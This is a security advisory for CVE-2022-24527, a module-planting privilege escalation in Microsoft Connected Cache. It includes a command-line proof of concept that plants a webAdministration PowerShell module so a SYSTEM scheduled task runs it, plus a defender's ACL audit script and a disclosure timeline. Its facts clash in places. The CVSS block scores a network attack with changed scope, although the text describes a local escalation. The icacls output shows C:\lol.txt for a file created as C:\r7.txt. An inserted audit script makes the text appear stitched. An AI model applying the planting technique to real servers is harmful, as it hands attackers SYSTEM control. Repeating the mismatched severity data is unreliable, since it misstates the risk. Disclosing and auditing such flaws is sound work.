CVSS3: 8.6 High
- Attack Vector: NETWORK
- Attack Complexity: LOW
- Privileges Required: NONE
- User Interaction: NONE
- Scope: CHANGED
- Confidentiality Impact: HIGH
- Integrity Impact: NONE
- Availability Impact: NONE
- Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVSS2: 5 Medium
- Access Vector: NETWORK
- Access Complexity: LOW
- Authentication: NONE
- Confidentiality Impact: PARTIAL
- Integrity Impact: NONE
- Availability Impact: NONE
- Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
On April 12, 2022, Microsoft published CVE-2022-24527, a local privilege escalation vulnerability in Microsoft Connected Cache. The vulnerability allowed a local low-privileged user to execute arbitrary PowerShell as SYSTEM due to improper file permission assignment (CWE-732).
Connected Cache is a feature used by Microsoft Endpoint Manager "Distribution Points" to support "Delivery Optimization."
This issue was discovered and reported by security researcher Jake Baines as part of Rapid7's vulnerability disclosure program.
When Connected Cache is in use on a Distribution Point, it is installed, in part, into C:\Doinc\. Below, you can see that there are some PowerShell scripts within that directory:
C:\>dir /s /b C:\Doinc\
C:\Doinc\Product
C:\Doinc\Product\Install
C:\Doinc\Product\Install\Logs
C:\Doinc\Product\Install\Tasks
C:\Doinc\Product\Install\Tasks\CacheNodeKeepAlive.ps1
C:\Doinc\Product\Install\Tasks\Maintenance.ps1
C:\Doinc\Product\Install\Tasks\SetDrivesToHealthy.ps1
Low-privileged users only have read and execute permissions on the PowerShell scripts:
C:\Doinc\Product\Install\Tasks>icacls *.ps1
CacheNodeKeepAlive.ps1 NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\NETWORK SERVICE:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Maintenance.ps1 NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\NETWORK SERVICE:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
SetDrivesToHealthy.ps1 NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\NETWORK SERVICE:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 3 files; Failed processing 0 files
The PowerShell scripts are executed every 60 seconds by the Task Scheduler as NT AUTHORITY\SYSTEM. All that is fine. The following part is where trouble begins. This is how SetDrivesToHealthy.ps1 starts:
try
{
    import-module 'webAdministration'
    $error.clear()
When SetDrivesToHealthy.ps1 executes, it attempts to load the webAdministration module. Before searching the normal %PSModulePath% path, SetDrivesToHealthy.ps1 looks for the import in C:\Doinc\Product\Install\Tasks\WindowsPowerShell\Modules\webAdministration\. As we saw above, this directory doesn't exist. And while low-privileged users can't modify the Connected Cache PowerShell scripts, they do have sufficient privileges to add subdirectories and files to C:\Doinc\Product\Install\Tasks\, as the (AD) and (WD) entries for BUILTIN\Users show:
C:\Doinc\Product\Install>icacls ./Tasks/
./Tasks/ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
NT AUTHORITY\NETWORK SERVICE:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(AD)
BUILTIN\Users:(I)(CI)(WD)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
An attacker can create the necessary directory structure and place their own webAdministration module there so that SetDrivesToHealthy.ps1 will import it. In the proof of concept below, the low-privileged attacker creates the directory structure and a PowerShell module that creates the file C:\r7.txt.
C:\Doinc\Product\Install\Tasks>dir C:\
Volume in drive C has no label.
Volume Serial Number is 3073-81A6
Directory of C:\
01/04/2022 05:01 PM <DIR> Doinc
01/04/2022 05:15 PM <DIR> DOINC-E77D08D0-5FEA-4315-8C95-10D359D59294
01/04/2022 03:48 PM <DIR> inetpub
07/07/2021 04:05 AM <DIR> PerfLogs
01/05/2022 09:29 AM <DIR> Program Files
01/05/2022 09:29 AM <DIR> Program Files (x86)
01/05/2022 09:16 AM <DIR> SCCMContentLib
01/05/2022 09:15 AM <DIR> SMSPKGC$
01/05/2022 09:17 AM <DIR> SMSSIG$
01/05/2022 09:17 AM <DIR> SMS_DP$
01/04/2022 05:04 PM <DIR> Users
01/04/2022 03:48 PM <DIR> Windows
0 File(s) 0 bytes
12 Dir(s) 239,837,327,360 bytes free
C:\Doinc\Product\Install\Tasks>mkdir WindowsPowerShell
C:\Doinc\Product\Install\Tasks>mkdir WindowsPowerShell\Modules\
C:\Doinc\Product\Install\Tasks>mkdir WindowsPowerShell\Modules\webAdministration\
C:\Doinc\Product\Install\Tasks>echo New-Item C:\r7.txt > WindowsPowerShell\Modules\webAdministration\webAdministration.psm1
C:\Doinc\Product\Install\Tasks>dir C:\
Volume in drive C has no label.
Volume Serial Number is 3073-81A6
Directory of C:\
01/04/2022 05:01 PM <DIR> Doinc
01/04/2022 05:15 PM <DIR> DOINC-E77D08D0-5FEA-4315-8C95-10D359D59294
01/04/2022 03:48 PM <DIR> inetpub
01/05/2022 01:49 PM 0 r7.txt
07/07/2021 04:05 AM <DIR> PerfLogs
01/05/2022 09:29 AM <DIR> Program Files
01/05/2022 09:29 AM <DIR> Program Files (x86)
01/05/2022 09:16 AM <DIR> SCCMContentLib
01/05/2022 09:15 AM <DIR> SMSPKGC$
01/05/2022 09:17 AM <DIR> SMSSIG$
01/05/2022 09:17 AM <DIR> SMS_DP$
01/04/2022 05:04 PM <DIR> Users
01/04/2022 03:48 PM <DIR> Windows
1 File(s) 0 bytes
12 Dir(s) 239,836,917,760 bytes free
C:\Doinc\Product\Install\Tasks>icacls C:\r7.txt
C:\lol.txt NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
C:\Doinc\Product\Install\Tasks>
As you can see, the C:\r7.txt file is created, demonstrating the privilege escalation.
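As an added defender's check (not code from the advisory, from Rapid7, or from Microsoft), the PowerShell below audits the Tasks directory for the same plant-able ACEs that icacls showed above, flags any module directory already sitting where the import resolves, and notes the script-side fix of importing by full path. The Tasks path comes from the advisory; the stock WebAdministration module location is an assumption and should be verified on your own server.

```powershell
# Added audit example, not Microsoft's or Rapid7's code. Assumes the Connected
# Cache task directory from the advisory; adjust $TasksDir if yours differs.
$TasksDir  = 'C:\Doinc\Product\Install\Tasks'
$HijackDir = Join-Path $TasksDir 'WindowsPowerShell\Modules\webAdministration'

# Rights that let a principal plant new files or subdirectories. These are the
# (WD) and (AD) flags icacls printed for BUILTIN\Users on the Tasks directory.
$PlantRights = [System.Security.AccessControl.FileSystemRights]::WriteData -bor
               [System.Security.AccessControl.FileSystemRights]::AppendData

# Principals that any local low-privileged account belongs to.
$BroadPrincipals = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users')

function Find-PlantableAce {
    param([Parameter(Mandatory)][string]$Path)
    # Return every Allow ACE that grants a broad principal file/directory creation.
    (Get-Acl -Path $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($_.FileSystemRights -band $PlantRights) -ne 0 -and
        $_.IdentityReference.Value -in $BroadPrincipals
    }
}

$findings = Find-PlantableAce -Path $TasksDir
if ($findings) {
    Write-Warning "Low-privileged principals can plant files under $TasksDir"
    $findings | Format-Table IdentityReference, FileSystemRights, InheritanceFlags -AutoSize
} else {
    Write-Output "No plant-able ACEs for broad principals on $TasksDir"
}

# A planted module would sit exactly where the task script resolves the import,
# so its mere presence under a SYSTEM-run task directory is worth an alert.
if (Test-Path -Path $HijackDir) {
    Write-Warning "Unexpected module directory present: $HijackDir"
    Get-ChildItem -Path $HijackDir -Recurse -File |
        Select-Object FullName, Length, LastWriteTime,
                      @{ n = 'Owner'; e = { (Get-Acl -Path $_.FullName).Owner } }
}

# Script-side hardening for a task author: import by full path from a location
# only administrators can write, so a writable directory earlier in the module
# search order cannot supply the module. The path below is the assumed stock
# IIS module location on Windows Server; confirm it before relying on it.
# Import-Module "$env:windir\System32\WindowsPowerShell\v1.0\Modules\WebAdministration\WebAdministration.psd1"
```

Run it elevated on the Distribution Point; on a patched host the ACE check should come back clean and the module directory should not exist.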
Follow Microsoft guidance on updating the Distribution Point software. If that is not possible, disabling the caching feature will effectively mitigate this issue.
- **January 5, 2022:** Issue disclosed to the vendor
- **January 5, 2022:** Vendor acknowledgement
- **January 6, 2022:** Vendor assigns a case identifier
- **January 10-11, 2022:** Vendor and researcher discuss clarifying details
- **January 19, 2022:** Vendor confirms the vulnerability
- **February-March 2022:** Vendor and researcher coordinate on disclosure date and CVE assignment
- **April 12, 2022:** Public disclosure (this document)